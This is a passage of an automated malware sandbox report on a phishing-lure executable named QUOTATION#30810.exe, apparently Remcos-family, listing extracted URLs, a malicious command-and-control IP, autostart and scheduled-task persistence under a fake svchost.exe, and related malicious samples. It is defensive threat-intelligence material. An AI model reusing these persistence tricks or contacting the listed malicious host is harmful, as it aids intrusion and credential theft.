                                                                          https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://login.yahoo.com/config/loginvbc.exefalse
                                                                              high
                                                                              https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://Passport.NET/tbsvchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001F.00000003.1797644727.0000013DBA872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.nirsoft.net/vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC802E0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.0000022707615000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDC19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080075000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://signup.live.com/signup.aspxsvchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB155000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://Passport.NET/tb_svchost.exe, 0000001F.00000002.3658907381.0000013DBB6AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658481481.0000013DBB600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • 0%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://login.microsoftonline.com/MSARST2.srf=svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd84svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://geoplugin.net/json.gplvbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • 0%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0nsvchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://account.live.com/msangcwamsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765186757.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://geoplugin.net/json.gpCtvbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.imvu.comvbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustensvchost.exe, 0000001F.00000003.3655978319.0000013DBB137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656004311.0000013DBB13A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656111087.0000013DBB141000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656988856.0000013DBB143000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://crl.ver)svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        low
                                                                                                                        http://passport.net/tbsvchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://upx.sf.netAmcache.hve.25.drfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-svchost.exe, 0000001F.00000003.1815397781.0000013DBB12B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf/svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddresvchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                                                                                                        high
                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfisvchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfREsvchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://login.microsofhsvchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.ebuddy.comvbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    172.245.208.13
                                                                                                                                                                    unknownUnited States
                                                                                                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                                                                                                    178.237.33.50
                                                                                                                                                                    geoplugin.netNetherlands
                                                                                                                                                                    8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                    Analysis ID:1435939
                                                                                                                                                                    Start date and time:2024-05-03 13:12:10 +02:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 12m 18s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:53
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:QUOTATION#30810.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@77/31@1/2
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 96%
                                                                                                                                                                    • Number of executed functions: 153
                                                                                                                                                                    • Number of non-executed functions: 166
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.126.24.146, 40.126.24.83, 20.190.152.19, 40.126.24.147, 40.126.24.81, 20.190.152.20, 20.190.152.22, 40.126.24.82, 20.42.73.29, 20.189.173.22
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    13:13:28Task SchedulerRun new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                    13:13:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                    13:13:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                    13:13:51API Interceptor3x Sleep call for process: WerFault.exe modified
                                                                                                                                                                    13:14:25API Interceptor4255328x Sleep call for process: vbc.exe modified
                                                                                                                                                                    13:16:52API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    172.245.208.13QUOTATION#30082.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                      ESN7N5cwzZ.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                        SecuriteInfo.com.Win32.Evo-gen.25660.20544.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                          SecuriteInfo.com.Win32.Evo-gen.15258.6765.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                            Specification-Glycyrrhetic Acid 3-O-Glucuronide.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.9756.30202.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                SecuriteInfo.com.Win32.Evo-gen.7105.24636.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                  MACHINE SPECIFICATIONS.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                    178.237.33.50proof of payment.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    GVV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • geoplugin.net/json.gp
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    geoplugin.netproof of payment.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    GVV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    AS-COLOCROSSINGUSyouhaveonefilefortody.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 172.245.123.18
                                                                                                                                                                                    s9ZjvgSMt1.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.3.101.142
                                                                                                                                                                                    getinher.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 172.245.123.18
                                                                                                                                                                                    citat #05022024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 172.245.123.18
                                                                                                                                                                                    citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 192.3.101.142
                                                                                                                                                                                    rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 192.3.243.154
                                                                                                                                                                                    qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                    • 192.3.243.154
                                                                                                                                                                                    ls3wzs2VQr.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 107.175.242.96
                                                                                                                                                                                    PO 2_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                    • 23.94.54.101
                                                                                                                                                                                    er).xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.3.109.135
                                                                                                                                                                                    ATOM86-ASATOM86NLproof of payment.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    GVV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                    • 178.237.33.50
                                                                                                                                                                                    No context
                                                                                                                                                                                    No context
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
